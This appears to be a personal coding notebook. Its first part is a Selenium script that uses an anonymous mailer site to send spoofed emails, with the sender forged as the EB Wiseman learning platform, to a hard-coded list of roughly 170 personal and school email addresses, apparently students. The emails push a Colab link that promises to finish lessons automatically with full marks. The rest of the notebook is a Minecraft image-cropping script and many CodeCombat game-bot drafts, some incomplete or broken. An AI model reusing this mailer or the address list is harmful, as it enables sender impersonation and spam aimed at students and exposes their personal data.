# from selenium import webdriver
# from selenium.webdriver.support.ui import WebDriverWait
# from selenium.webdriver.common.by import By
# from selenium.webdriver.support import expected_conditions as EC
# 設置Chrome啓動設置
options = webdriver.ChromeOptions()
# 無界面運行
options.add_argument('--headless')
# 以最高权限运行
options.add_argument('--no-sandbox')
# 忽略警告\錯誤\異常
options.add_argument('log-level=3')
# log-level: 
# Sets the minimum log level.
# Valid values are from 0 to 3: 
#     INFO = 0, 
#     WARNING = 1, 
#     LOG_ERROR = 2, 
#     LOG_FATAL = 3.
# default is 0.
# 避免崩潰
options.add_argument('--disable-dev-shm-usage')
# 開啓Chrome並加入基礎設置
driver = webdriver.Chrome(options=options)
# 設定等待元素時間上限(單位秒)
wait = WebDriverWait(driver,10)
# 清除輸出内容
output.clear()

email1='52101314lyn@gmail.com,s16071@tiaccwhf.edu.hk,s17069@tiaccwhf.edu.hk,s17063@tiaccwhf.edu.hk,3181485713@qq.com,3198498375@qq.com,1300768727@qq.com,764656342@qq,2529159730@qq.com,2669145233@qq.com,s18101@tiaccwhf.edu.hk,s17011@tiaccwhf.edu.hk,iumeiyin825@gmail.com,mandylau825@gmail.com,rain2005@icloud.com,s18109@tiaccwhf.edu.hk,w2715070455@gmail.com,1062186332@qq.com,s17055@tiaccwhf.edu.hk,s17077@tiaccwhf.edu.hk,s17056@tiaccwhf.edu.hk,s18125@tiaccwhf.edu.hk,702697421@qq.com,s18118@tiaccwhf.edu.hk,s17049@tiaccwhf.edu.hk,yushiqing477@gmail.com,20031009z@gmail.com,s17003@tiaccwhf.edu.hk,s17004@tiaccwhf.edu.hk,s17006@tiaccwhf.edu.hk,s17007@tiaccwhf.edu.hk,s17012@tiaccwhf.edu.hk,s17014@tiaccwhf.edu.hk,s17016@tiaccwhf.edu.hk,s17017@tiaccwhf.edu.hk,s17019@tiaccwhf.edu.hk,s17023@tiaccwhf.edu.hk,queenie200543@gmail.com,tiaccwhf@s17072.edu,s18113@tiaccwhf.edu.hk,s17030@tiaccwhf.edu.hk,s17031@tiaccwhf.edu.hk,s17075@tiaccwhf.edu.hk,s17036@tiaccwhf.edu.hk,s17041@tiaccwhf.edu.hk,s17042@tiaccwhf.edu.hk,s18166@tiaccwhf.edu.hk,s17043@tiaccwhf.edu.hk,s17060@tiaccwhf.gmail.com,s17076@tiaccwhf.edu.hk,S17047@tiaccwhf.ebu,s18119@tiaccwhf.edu.hk,s17048@tiaccwhf.edu.hk,s17078@tiaccwhf.gmail.com,s17052@tiaccwhf.edu.hk,s17051@tiaccwhf.edu.hk,s17053@tiaccwhf.edu.hk,s17001@tiaccwhf.edu.hk,lyy061568@gamil.com,s17008@tiaccwhf.edu.hk,s17026@tiaccwhf.edu.hk,s17061@tiaccwhf.edu.hk,s17035@tiaccwhf.edu.hk,s17071@tiaccwhf.edu.hk,s17039@tiaccwhf.edu.hk,eatherwong@gmail.com,s17044@tiaccwhf.com,s17045@tiaccwhf.edu.hk,s16038@tiaccwhf.edu.hk,gxjyxgixtixti@gicigxgi,2237151987@qq.com,2481018922@qq.com,s16001@tiaccwhf.edu.hk,5a03@tiaccwhf.edu.hk,s16004@tiaccwhf.edu.hk,s19108@tiaccwhf.edu.hk,cohcmbgh@sfnte,s16011@tiaccwhf.edu.hk,s16014@tiaccwhf.edu.hk,s18103@tiaccwhf.edu.hk,tiaccwhf@s18114.edu.hk,s16018@tiaccwhf.edu.hk,2118837174@qq.com,1839596633@qq.com,s18112@tiaccwhf.edu.hk,s16019@tiaccwhf.edu.hk,henrylujingbin@yahoo.com,s19112@tiaccwhf.edu.hk,s16087@tiaccwhf.edu.hk,s16035@tiaccehf.edu.hk,s16077@tiaccwhf.edu.hk,xie2327530473@gmail.com,398686889@qq.com,s16071@tiaccwhf.edu.hk,s16074@tiaccwhf.edu.hk,1830895934@qq.com,cohcmbgh@sfnte,751648535@qq.com,s16015@tiaccwhf.edu.hk,s16051@tiaccwhf.edu.hk,372855097@qq.com,1413538367@qq.com,674255595@qq.com,s16088@tiaccwhf.edu.hk,542415435@qq.com,sfnhjsh@21,s18117@tiaccwhf.edu.hk,rubywing2003@gmail.com,ggjguug@gmail.com,1158936035@qq.com,whjeue@gmail.com,s16037@tiaccwhf.edu.hk,2583983139@qq.com,2062118527@qq.com,kwoklaisau@gmail.com,s15028@tiaccwhf.edu.hk,Leekinfei54@gmail.com,leesumwing99@gmail.com,s15036@tiaccwhf.edu.hk,ygweyw@ghd.com,jbndjanu@ADASD,920385326@qq.com,2414682068@qq.com,s16022@tiaccwhf.edu.hk,shichichi1314@gmail.com,s15048@gmail.com,s15049@tiaccwhf.edu.hk,2838959765@qq.com,1907601702@qq.com,annnnnaa613@gmail.com,s16033@tiaccwhf.edu.hk,angel19690101@gmail.com,1516699793@qq.com,1300761528@qq.com,s15012@tiaccwhf.edu.hk,s15014@tiaccwhf.edu.hk,18219293633cy@gmail.com,S16064@tiaccwhf.edu.hk,csyphoebe@hotmail.com,s15063@tiaccwhf.edu.hk,1275941794@qq.com,s16141@tiaccwhf.edu.hk,sfnhjsh@21,lauholong1@gmail.com,s15027@tiaccwhf.edu.hk,s15033@tiaccwhf.edu.hk,s16153@tiaccwhf.edu.hk,s15078@tiaccwhf.edu.hk,s15040@tiaccwhf.edu.hk,wusongjie2000@gmail.com,ngryan1225@gmail.com,s15044@tiaccwhf.edu.hk,qq2621880471@gmail.com,1766884650@qq.com,123@123.com,xie2327530473@gmail.com,s16138@tiaccwhf.edu.hk,1456508847@qq.com,chankaka0317@gamil.com,1018533420@qq.com,s15019@tiaccwhf.edu.hk,s15021@tiaccwhf.edu.hk,hyb123465@icloud.com,213hh6@gmail.com,s16147@tiaccwhf.edu.hk,s15038@tiaccwhf.edu.hk,s15046@tiaccwhf.edu.hk,s15047@tiaccwhf.edu.hk,s15077@tiaccwhf.edu.hk,ds100130@sina.com,s15057@whf.edu.hk,s15067@tiaccwhf.edu.hk,1290472955@qq.com';
email=email1.split(",");
driver.get('https://emkei.cz/')
for i in email:
  print(f'{email.index(i)}/{len(email)}:')
  wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="text"]')))#[@src="/notice.png"]
  wait.until(EC.presence_of_element_located((By.XPATH,'//*[@id="fromname"]')))#[@value=""]
  driver.find_element_by_id("fromname").send_keys('Wise Team')
  driver.find_element_by_id("from").send_keys('ebwiseman@wiseman.com.hk')
  driver.find_element_by_id("rcpt").send_keys(i)
  driver.find_element_by_id("subject").send_keys('[EB Wiseman] Lessons can now be completed automatically!')
  driver.find_element_by_id("text").send_keys('''
Dear Student,

EB Wiseman has recently upgraded lessons. Please note that your scores will remain unchanged for completed lessons.

You can click here to complete your lessons automatically and with full marks:https://colab.research.google.com/github/LDwise/autoWiseman/blob/main/autoScore.ipynb

More Detail:
This project is using Google colab(https://colab.research.google.com/) to perform operations, the process does not retain any personal information, and free and open source. Please enjoy!

Sincerely,
wise team

Other Website: www.wiseman.com.hk
--------------------------------------------------------------
亲爱的学生，

EB Wiseman最近升级了课程。请注意，已完成的课程，您的分数将保持不变。

您可以点击这里自动完成课程，并获得满分。https://colab.research.google.com/github/LDwise/autoWiseman/blob/main/autoScore.ipynb

更多详情。
本项目采用Google colab(https://colab.research.google.com/)进行操作，过程中不保留任何个人信息，免费开源。请大家欣赏!

真诚的。
wise小组

其他网站：www.wiseman.com.hk
  ''')
  driver.find_element_by_xpath('//input[@type="submit"][@value="Send"]').click()
  wait.until(EC.presence_of_element_located((By.XPATH,"/html/body/div[@id='allio']/div[@class='pbottom msg']/table[@class='msg']")))#[@src="/notice.png"]
  print(i)
driver.quit()

# MC mcedit 插件

In [ ]:
#@title minecraft img crop for MapIt! fillter { vertical-output: true, display-mode: "form" }

#conding=utf8
from PIL import Image
from os import walk
from os import path as pth
from re import sub
from math import floor

name_list=[]

#@markdown 遍历文件夹
g = walk("C:/Users/LD/Documents/MCEdit/img")
for path,dir_list,file_list in g:
  for file_name in file_list:
    name_list.append(file_name)
for name in name_list:
  img = Image.open(f'C:/Users/LD/Documents/MCEdit/img/{name}')
  #@markdown 获取大小
  x,y = img.size
  #@markdown 换算128比例
  bx,by = floor(x/128),floor(y/128)
  #@markdown 求得新大小
  nx,ny = bx*128,by*128
  #@markdown 运算裁剪位置
  x1,y1,x2,y2 = abs((x-nx)/2),abs((y-ny)/2),abs(((x-nx)/2)+nx),abs(((y-ny)/2)+ny)
  cropped = img.crop((x1,y1,x2,y2))  # (left, upper, right, lower)
  #@markdown 输出比例为文件名
  orign_name=sub(r'\.\w+','',str(name))
  cropped.save(f"C:/Users/LD/Documents/MCEdit/out/{orign_name}[{bx},{by}].png")
  print(name,x1,y2,x1,y2,orign_name,bx,by)


# Codecombat backup

In [ ]:
#@title Codecombat { vertical-output: true, display-mode: "form" }
#@markdown 思路:
#@markdown 主要躲避墻或炸彈,次要補血,其後奪金害人
#@markdown 
#@markdown 
#@markdown def 前路是否能走
#@markdown 
#@markdown def 路徑是否合適
#@markdown 
#@markdown 
#@markdown - 如果前方有墻:
#@markdown   - $躲避
#@markdown   - 選擇最近的安全路徑
#@markdown   - 要麽+1,要麽-1,要麽+2,要麽-2...
#@markdown - 如果前方有炸彈:
#@markdown   - 擊毀炸彈
#@markdown - 其他:
#@markdown   - $休閑時間
#@markdown   - 如果生命垂危:
#@markdown     - 尋找藥水位置
#@markdown     - 檢測路途是否合適
#@markdown       - 走
#@markdown   - 如果生命充足:
#@markdown     - 尋找金幣
#@markdown       - 距離進的
#@markdown 
#@markdown 躲避墻或炸彈:  
#@markdown 檢測上下路何路可行=同樣y位置前後4m有無障礙物存在  
#@markdown 直到越過該路最近的障礙物=由y位置方向靠英雄最近的障礙物,英雄y位置已經大於  
#@markdown 行走8m
#@markdown 
#@markdown 
###########################################################
hero.playAs=("sorcerer")
hero.moveUp()
hero.moveDown()
hero.shoot()
hero.usePower("long-wall")
hero.findNearestInLane()
hero.findNearestPotion()
hero.findNearestCoin()
hero.findNearestWall()
hero.findNearestBomb()
hero.findAllInLane()
hero.distanceInLane(target)
hero.costOfPower("long-wall")
hero.say("message")
hero.debug(arguments)
hero.time
lane
hero.gold
hero.safestLane()
hero.isSafeStay()
hero.isSafeMoveUp()
hero.isSafeMoveDown()
################################################################################
hero.playAs("potion-master")

def detect(num=1):
    obj = hero.findNearestInLane(num)
    if obj and (obj.type=='wall') and (hero.distanceInLane(obj)<(4*num)):
        return False
    else:
        return True

def findway():
    line = hero.lane
    for num in range(0,6):
        if detect(num):
            # try line safe
            if num>hero.lane:
                while line!=num:
                    line+=1
                    if detect():
                        continue
                    else:
                        break
            elif hero.lane>num:
                step = line-num

while True:
    if detect(hero.lane)==False:
        # up or down
        if (hero.lane!=5) and detect(hero.lane+1):
            hero.moveUp()
        elif (hero.lane!=0) and detect(hero.lane-1):
            hero.moveDown()
    hero.shoot()
################################################################################
hero.playAs("potion-master")

def detect(num,times=1):
    obj = hero.findNearestInLane(num)
    if obj and ((obj.type=='wall')or(obj.type=='bomb')) and (hero.distanceInLane(obj)<=(4*times)):
        return False
    else:
        return True

def findway():
    line = hero.lane
    for step in range(1,6):
        if (line+step<5) and detect(line+step,step):
            return (line+step)
            break
        elif (line+step>0) and detect(line-step,step):
            return (line-step)
            break

while True:
    if detect(hero.lane):
        hero.shoot()
    else:
        # up or down
        if findway():
            line = findway()
            while hero.lane!=line:
                if hero.lane > line:
                    for time in range(hero.lane-line):
                        hero.moveDown()
                elif hero.lane < line:
                    for time in range(line-hero.lane):
                        hero.moveUp()
        else:
            hero.say("way:"+findway())
################################################################################
hero.playAs("potion-master")

def detect(num,times=1):
    obj = hero.findNearestInLane(num)
    if obj and ((obj.type=='wall')or(obj.type=='bomb')) and (hero.distanceInLane(obj)<=(4*times)):
        return False
    else:
        return True

def findway():
    line = hero.lane
    for step in range(1,6):
        if (line+step<5) and detect(line+step,step):
            return (line+step)
            break
        elif (line+step>0) and detect(line-step,step):
            return (line-step)
            break

target_y = hero.pos.y
while True:
    if detect(hero.lane):
        if hero.pos.y != target_y:
            hero.say("moving")
        else:
            hero.shoot()
    else:
        # up or down
        if findway():
            line = findway()
            while hero.lane!=line:
                if hero.lane > line:
                    for time in range(hero.lane-line):
                        target_y=hero.pos.y-4
                        hero.moveDown()
                elif hero.lane < line:
                    for time in range(line-hero.lane):
                        target_y=hero.pos.y+4
                        hero.moveUp()
        else:
            hero.say("way:"+findway())
################################################################################
hero.playAs("potion-master")

#health,maxHealth,isReady(action)
posy=[26,22,18,14,10,6]

#檢測單行是否能行走
def detect(rownumber,times=1):
    obj = hero.findNearestInLane(rownumber)
    if obj and ((obj.type=='wall') or (obj.type=='bomb')) and (hero.distanceInLane(obj) <= (4*times)):
        return obj.type
    else:
        return 'safe'

#是否站穩以便檢測
def clam():
    if hero.pos.y in posy:
        return True
    else:
        return False

#主循環
while True:
    if clam():
        if detect(hero.lane)=='safe':
            hero.shoot()
        else:
            if (hero.lane+1<5) and detect(hero.lane+1)=='safe':
                hero.moveUp()
            elif (hero.lane+1>0) and detect(hero.lane-1)=='safe':
                hero.moveDown()
################################################################################
hero.playAs("potion-master")
hero.say("Hey! My friend, thank you for destroying me! I will absorb this experience to fight you back.")
posy=[26,22,18,14,10,6]

#檢測指定行是否可行
def detect(rowNumber):
    obj =  hero.findNearestInLane(rowNumber)
    if obj and ((obj.type=='wall') or (obj.type=='bomb')) and hero.distanceInLane(obj) <= 4:
        return False
    else:
        return True

# 主循環
while True:
    if hero.pos.y in posy:
    if detect(hero.lane):
        if hero.isSafeStay() and (hero.costOfPower("shield") < hero.gold):
            for times in range(2):
                hero.usePower("long-wall")
        else:
            hero.shoot()
    else:
        if hero.lane<5 and detect(hero.lane+1):
            hero.moveUp()
        elif hero.lane>0 and detect(hero.lane-1):
            hero.moveDown()
        else:
            if hero.costOfPower("blink") < hero.gold:
                hero.usePower("blink")
            elif hero.costOfPower("shield") < hero.gold:
                hero.usePower("shield")
            else:
                hero.say("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
################################################################################
hero.playAs("potion-master")
hero.say("Hey! My friend, thank you for destroying me! I will absorb this experience to fight you back.")
posy=[26,22,18,14,10,6]

def detect(rowNumber):
    '檢測指定行是否可行'
    obj =  hero.findNearestInLane(rowNumber)
    if obj and ((obj.type=='wall') or (obj.type=='bomb')) and hero.distanceInLane(obj) <= 4:
        return False
    else:
        return True

def distance(x1,y1,x2,y2):
    '計算兩點距離,包含垂直與水平'
    return ((x1-x2)**2+(y1-y2)**2)**0.5

def uod():
    'up or down'
    potion = hero.findNearestPotion()
    px,py,pz = potion.pos
    coin = hero.findNearestCoin()
    cx,cy,cz = coin.pos
    if potion and coin and distance(px,py,hero.pos.x,hero.pos.y)>=distance(cx,cy,hero.pos.x,hero.pos.y):
        while detect(hero.lane+1) and potion.lane > hero.lane:
            hero.moveUp()
        while detect(hero.lane-1) and potion.lane < hero.lane:
            hero.moveDown()
    else:
        while detect(hero.lane+1) and coin.lane > hero.lane:
            hero.moveUp()
        while detect(hero.lane-1) and coin.lane < hero.lane:
            hero.moveDown()

# 主循環
while True:
    if detect(hero.lane) and (hero.pos.y in posy) and (hero.isSafeStay()):
        if hero.costOfPower("long-wall")*2 < hero.gold:
            for times in range(2):
                hero.usePower("long-wall")
        else:
            hero.shoot()
    else:
        if hero.lane<5 and detect(hero.lane+1):
            hero.moveUp()
        elif hero.lane>0 and detect(hero.lane-1):
            hero.moveDown()
        else:
            if hero.costOfPower("blink") < hero.gold:
                hero.usePower("blink")
            elif hero.costOfPower("shield") < hero.gold:
                hero.usePower("shield")
            else:
                hero.say("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
################################################################################
hero.playAs("potion-master")
posy=[26,22,18,14,10,6]
#wall
#9c 0HP,3c 1hp,0c
#bomb
#6c 0HP,0c 2hp.0c

def moving():
    '等待移動完成'
    while hero.pos.y not in posy:
        hero.say("moving")


def block(obj):
    '檢測指定物件是否屬於障礙物'
    if (obj.type=='wall') or (obj.type=='bomb'):
        return True
    else:
        return False

def detect(rowNumber):
    '檢測指定路徑是否可行'
    obj =  hero.findNearestInLane(rowNumber)
    if obj and block(obj) and hero.distanceInLane(obj) <= 4:
        return False
    else:
        return True

def closeTo(obj,rowNumber=hero.lane):
    if obj:
        if obj.lane > rowNumber and detect(rowNumber) and detect(rowNumber+1) and hero.isSafeMoveUp():
            hero.moveUp()
            moving()
        elif obj.lane < rowNumber and detect(rowNumber) and detect(rowNumber-1) and hero.isSafeMoveDown():
            hero.moveDown()
            moving()

hero.shoot()

# 主循環
while True:
    if detect(hero.lane) and hero.isSafeStay():
        # 檢測路徑可以行走 并且 距離障礙物較遠
        # 判斷是否需要藥水
        if hero.health < hero.maxHealth:
            # 需要藥水
            closeTo(hero.findNearestPotion())
        else:
            # 可以尋找金幣,陷害對手
            closeTo(hero.findNearestCoin())
    elif detect(hero.lane):
        # 檢測路徑可以行走
        # 清除炸彈
        hero.shoot()
    else:
        # 檢測路徑不可行走
        if (hero.lane<5 and detect(hero.lane+1)) and (hero.lane>0 and detect(hero.lane-1)):
            # 如果上下兩條路都可以走
            # 選擇任意
            hero.moveUp()
            moving()
        elif hero.lane<5 and detect(hero.lane+1):
            # 只能走上方路徑
            hero.moveUp()
            moving()
        elif hero.lane>0 and detect(hero.lane-1):
            # 只能走下方路徑
            hero.moveDown()
            moving()
        else:
            # 只能用power避免
            laneObjects = hero.findAllInLane(hero.lane)
            if len(laneObjects) <= 1 and block(laneObjects[0]):
                # 路徑短距離内單個障礙物
                if hero.costOfPower("blink") < hero.gold:
                    hero.usePower("blink")
            elif len(laneObjects) >= 2 and block(laneObjects[0]) and block(laneObjects[1]):
                # 路徑短距離内多個障礙物
                if hero.costOfPower("shield") < hero.gold:
                    hero.usePower("shield")
################################################################################
hero.playAs("sorcerer")

def block(obj):
    '對象是否會阻擋'
    if obj.type=='wall' or obj.type=='bomb':
        return False
    else:
        return True

def detect(rowNumber,times=1):
    '指定路徑是否可行'
    obj = hero.findNearestInLane(rowNumber)
    if obj and block(obj) and hero.distanceInLane(obj) <= (4*times):
        return False
    else:
        return True

def close(obj):
    '靠近對象路徑'
    if obj:
        #確認對象存在可以靠近
        if obj.lane > hero.lane and detect(hero.lane+1):
            #對象路徑在上方
            hero.moveUp()
        elif  obj.lane < hero.lane and detect(hero.lane-1):
            #對象路徑在下方
            hero.moveDown()

while True:
    #檢測有沒有障礙物
    obj = hero.findNearestInLane()
    if obj and obj.type=='wall':
        #遇到墻壁需要躲避
        if ((hero.lane<5) and detect(hero.lane+1)) and ((hero.lane>0) and detect(hero.lane-1)):
            #上下路徑均可行
            #尋找藥水或者金幣
            if hero.health < hero.maxHealth:
                #尋找藥水
                close(hero.findNearestPotion())
            else:
                #尋找金幣
                close(hero.findNearestCoin())
        elif (hero.lane<5) and detect(hero.lane+1):
            #上路徑可行
            hero.moveUp()
        elif (hero.lane>0) and detect(hero.lane-1):
            #下路徑可行
            hero.moveDown()
        else:
            #沒有較近的路徑可行
            laneObjects = hero.findAllInLane(hero.lane)
            if len(laneObjects) <= 1 and block(laneObjects[0]):
                # 路徑短距離内單個障礙物
                if hero.costOfPower("blink") < hero.gold:
                    hero.usePower("blink")
            elif len(laneObjects) >= 2 and block(laneObjects[0]) and block(laneObjects[1]):
                # 路徑短距離内多個障礙物
                if hero.costOfPower("shield") < hero.gold:
                    hero.usePower("shield")
    elif obj and obj.type=='bomb':
        #遇到炸彈需要射擊
        hero.shoot()
    else:
        #狀態安全
        #可以選擇尋找藥水或者金幣或者損害對手
        if hero.health < hero.maxHealth:
            #尋找藥水在生命垂危的情況下
            close(hero.findNearestPotion())
        elif hero.coin<hero.costOfPower("shield"):
            #尋找金幣在金幣不足的情況下
            close(hero.findNearestCoin())
        elif hero.coin>hero.costOfPower("long-wall")*2 and detect(hero.lane,2):
            #損害對手在金幣超多的情況下
            #同時足夠時間多次損害對手
            for times in range(2):
                hero.usePower("long-wall")
################################################################################
hero.playAs("sorcerer")

for i in hero:
    now=hero.time
    while now <= 3:
        hero.debug(i)

def moveUp():
    if hero.lane+1<=5:
        hero.moveUp()

def block(obj):
    '是否屬於障礙物'
    if obj.type=='wall' or obj.type=='bomb':
        return True
    else:
        return False

def safe(rowNumber):
    '路徑是否安全'
    obj = hero.findNearestInLane(rowNumber)
    if obj and block(obj) and hero.distanceInLane(obj) < 4:
        return False
    else:
        return True

def close(obj):
    '安全靠近對象'
    if obj and safe(hero.lane+1) and (rowNumber+1)!=5 and obj.lane > hero.lane:
        hero.moveUp()
    elif obj and safe(hero.lane-1) and (rowNumber-1)!=0 and  obj.lane < hero.lane:
        hero.moveDown()

while True:
    obj = hero.findNearestInLane()
    if obj:
        if obj.type == "wall" and hero.distanceInLane(obj) <= 4:
            rowNumber = hero.lane
            if (rowNumber+1)!=5 and safe(rowNumber):
                hero.moveUp()
            elif (rowNumber-1)!=0 and safe(rowNumber):
                hero.moveDown()
            else:
                for i in range(6):
                    if safe(i):
                        if hero.costOfPower("blink") < hero.gold:
                            hero.usePower("blink",i)
                    else:
                        if hero.costOfPower("shield") < hero.gold:
                            hero.usePower("shield")
        elif obj.type == "bomb":
            hero.shoot()
    else:
        if hero.health < hero.maxHealth:
            close(hero.findNearestPotion())
        else:
            close(hero.findNearestCoin())
################################################################################
hero.playAs("sorcerer")

def block(obj):
    '檢測指定物件是否屬於障礙物'
    if obj and (obj.type=='wall' or obj.type=='bomb'):
        return True
    else:
        return False

def detect(row=hero.lane):
    obj = hero.findNearestInLane(row)
    if obj and block(obj) and hero.distanceInLane(obj) < 8:
        return False
    else:
        return True

while True:
    obj = hero.findNearestInLane()
    if detect()==False:
        if obj and obj.type=='bomb':
            hero.shoot()
        elif hero.lane < 5 and detect(hero.lane+1):
            hero.moveUp()
        elif hero.lane > 0 and detect(hero.lane+1):
            hero.moveDown()
        else:
            # 只能用power避免
            laneObjects = hero.findAllInLane(hero.lane)
            if len(laneObjects) <= 1 and block(laneObjects[0]) and hero.costOfPower("blink") < hero.gold:
                # 路徑短距離内單個障礙物
                hero.usePower("blink",hero.safestLane())
            elif len(laneObjects) >= 2 and block(laneObjects[0]) and block(laneObjects[1]) and hero.costOfPower("shield") < hero.gold:
                # 路徑短距離内多個障礙物
                hero.usePower("shield")
################################################################################
return  #Commented out to stop infinite loop.
hero.playAs("sorcerer")

for i in hero:
    now=hero.time
    while now <= 3:
        hero.say(i)

def moveUp():
    if hero.lane+1<=5:
        hero.moveUp()

def block(obj):
    '是否屬於障礙物'
    if obj.type=='wall' or obj.type=='bomb':
        return True
    else:
        return False

def safe(rowNumber):
    '路徑是否安全'
    obj = hero.findNearestInLane(rowNumber)
    if obj and block(obj) and hero.distanceInLane(obj) < 4:
        return False
    else:
        return True

def close(obj):
    '安全靠近對象'
    if obj and safe(hero.lane+1) and (rowNumber+1)!=5 and obj.lane > hero.lane:
        hero.moveUp()
    elif obj and safe(hero.lane-1) and (rowNumber-1)!=0 and  obj.lane < hero.lane:
        hero.moveDown()

while True:
    obj = hero.findNearestInLane()
    if obj:
        if obj.type == "wall" and hero.distanceInLane(obj) <= 4:
            rowNumber = hero.lane
            if (rowNumber+1)!=5 and safe(rowNumber):
                hero.moveUp()
            elif (rowNumber-1)!=0 and safe(rowNumber):
                hero.moveDown()
            else:
                for i in range(6):
                    if safe(i):
                        if hero.costOfPower("blink") < hero.gold:
                            hero.usePower("blink",i)
                    else:
                        if hero.costOfPower("shield") < hero.gold:
                            hero.usePower("shield")
        elif obj.type == "bomb":
            hero.shoot()
    else:
        if hero.health < hero.maxHealth:
            close(hero.findNearestPotion())
        else:
            close(hero.findNearestCoin())
################################################################################
hero.playAs("sorcerer")

def block(obj):
    '檢測指定物件是否屬於障礙物'
    if obj and (obj.type=='wall' or obj.type=='bomb'):
        return True
    else:
        return False

def detect(row=hero.lane):
    '檢測指定路徑是否能持續行走'
    obj = hero.findNearestInLane(row)
    if obj and block(obj) and hero.distanceInLane(obj) < 8:
        return False
    else:
        return True

def range(row,x):
    cx=x-4
    ax=x+4
    #範圍列表
    x = []
    for num in range(cx,ax):
      x.append(num)
    #在指定行所有物件内循環
    laneObjects = hero.findAllInLane(row)
    for obj in laneObjects:
      if (obj.pos.x in x) and block(obj):
        return False

while True:
    obj = hero.findNearestInLane()
    #前方是否有障礙物
    if obj and obj.type == "wall":
        #前方不能行走
        #選擇上下方行走
        if 
################################################################################
hero.playAs("sorcerer")

def block(obj):
    if obj and (obj.type=='wall' or obj.type=='bomb'):
        return True

def bomb(row=hero.lane):
    laneObjects = hero.findAllInLane()
    for obj in laneObjects:
        if obj.type=='bomb' and obj.lane==hero.lane:
            return True

def to(row):
    if row in range(0,6):
        laneObjects = hero.findAllInLane(row)
        for obj in laneObjects:
            if block(obj) and obj.pos.x < hero.pos.x+8:
                hero.debug(obj.type,(obj.type=='wall' or obj.type=='bomb'),obj.pos.x,hero.pos.x,obj.pos.x < hero.pos.x+8)
                return False

def close(obj):
    if obj and obj.lane>hero.lane and to(hero.lane+1)!=False:
        hero.moveUp()
    elif obj and obj.lane<hero.lane and to(hero.lane-1)!=False:
        hero.moveDown()

while True:
    wall = hero.findNearestWall()
    if wall and wall.lane==hero.lane and hero.distanceInLane(wall) <= 16:
        if to(hero.lane+1)!=False:
            hero.moveUp()
        elif to(hero.lane-1)!=False:
            hero.moveDown()
        elif hero.costOfPower("shield") < hero.gold:
            hero.usePower("shield")
        elif hero.costOfPower("blink") < hero.gold:
            hero.usePower("blink")
        else:
            hero.say("Ahaaaaaaaaaaaaaaaaaaaaaaaaaaaa!")
    else:
        if bomb():
            hero.shoot()
        elif hero.health < hero.maxHealth:
            close(hero.findNearestPotion())
        elif hero.costOfPower("long-wall")+24 < hero.gold:
            hero.usePower("long-wall")
        elif hero.costOfPower("bomb-wall")+24 < hero.gold:
            hero.usePower("bomb-wall")
        else:
            close(hero.findNearestCoin())
################################################################################
hero.playAs("sorcerer")

def block(obj):
    if obj and (obj.type=='wall' or obj.type=='bomb'):
        return True

while True:
    wall = hero.findNearestWall()
    bomb = hero.findNearestBomb()
    if wall and wall.lane==hero.lane and hero.distanceInLane(wall) <= 4:
        up = hero.findAllInLane(hero.lane+1)
        down = hero.findAllInLane(hero.lane-1)
        for obj in up:
            if block(obj) and (obj.pos.x in range(wall.pos.x,wall.pos.x+2+1)) and obj.lane==hero.lane+1:
                up = False
                break
        for obj in down:
            if block(obj) and (obj.pos.x in range(wall.pos.x,wall.pos.x+2+1)) and obj.lane==hero.lane-1:
                down = False
                break
        if hero.lane+1<=5 and up:
            hero.moveUp()
        elif hero.lane-1>=0 and down:
            hero.moveDown()
        elif hero.costOfPower("shield") < hero.gold:
            hero.usePower("shield")
        elif hero.costOfPower("blink") < hero.gold:
            hero.usePower("blink",hero.safestLane())
        else:
            hero.say("aaaaaaaaaaaaaaa")
    elif wall and bomb and bomb.lane==hero.lane and hero.distanceInLane(wall) <= 8:
        hero.say("nothing")
    elif bomb and bomb.lane==hero.lane:
        hero.shoot()
################################################################################
hero.playAs("sorcerer")

def block(obj):
    if obj and (obj.type=='wall' or obj.type=='bomb'):
        return True

while True:
    wall = hero.findNearestWall()
    bomb = hero.findNearestBomb()
    if wall and wall.lane==hero.lane and hero.distanceInLane(wall) <= 4:
        up = hero.findAllInLane(hero.lane+1)
        down = hero.findAllInLane(hero.lane-1)
        for obj in up:
            if block(obj) and (obj.pos.x in range(wall.pos.x,wall.pos.x+2+1)) and obj.lane==hero.lane+1:
                up = False
                break
        for obj in down:
            if block(obj) and (obj.pos.x in range(wall.pos.x,wall.pos.x+2+1)) and obj.lane==hero.lane-1:
                down = False
                break
        if hero.lane+1<=5 and up:
            hero.moveUp()
        elif hero.lane-1>=0 and down:
            hero.moveDown()
        elif hero.costOfPower("shield") < hero.gold:
            hero.usePower("shield")
        elif hero.costOfPower("blink") < hero.gold:
            hero.usePower("blink",hero.safestLane())
        else:
            hero.say("aaaaaaaaaaaaaaa")
    elif wall and bomb and bomb.lane==hero.lane and hero.distanceInLane(wall) <= 8:
        hero.say("nothing")
    elif bomb and bomb.lane==hero.lane:
        hero.shoot()
################################################################################
'''
三天之内撒了你

hero單次移動耗費0.25秒 等於4米
躲避炸彈-2,墻壁-1

檢測最近的墻壁
距離前方的墻壁小於8米就要躲避(8米確保不會撞到墻壁)
    上方道路行走範圍内(4米内)無存在墻壁或炸彈
        當前路徑 和 預行路徑 均要檢測
        檢測障礙物的y位置是否等於或存在hero當前y位置+4的範圍内
        上和下都可以躲避
    下方...
        下可行
    上方...
        上可行
    無路可行
        檢測指定路徑内16内障礙物最多(sheild耗時1秒,距離16米)
            使用sheild
        其他
            使用power閃現至safelane
當前路徑有炸彈
    射擊
安全狀態
    需要藥水靠近藥水
    如若不然則靠近金幣
--------------------------------------------------------------
檢測當前是否安全isSafeStay:
  當前安全
  前方有無炸彈 有則射擊
  當前是否需要藥水 是則靠近藥水
  金幣是否足夠完成wall+bomb二連擊 是則使用能力
  當前是否需要金幣 是則靠近金幣
其他
  當前危險
  判斷指定路徑是否安全
    路徑在範圍内無障礙物
    hero移動需要4米 防止4米后撞墻 需要大於4米的範圍 保險4+2+1米 2米以便單行移動不扣血
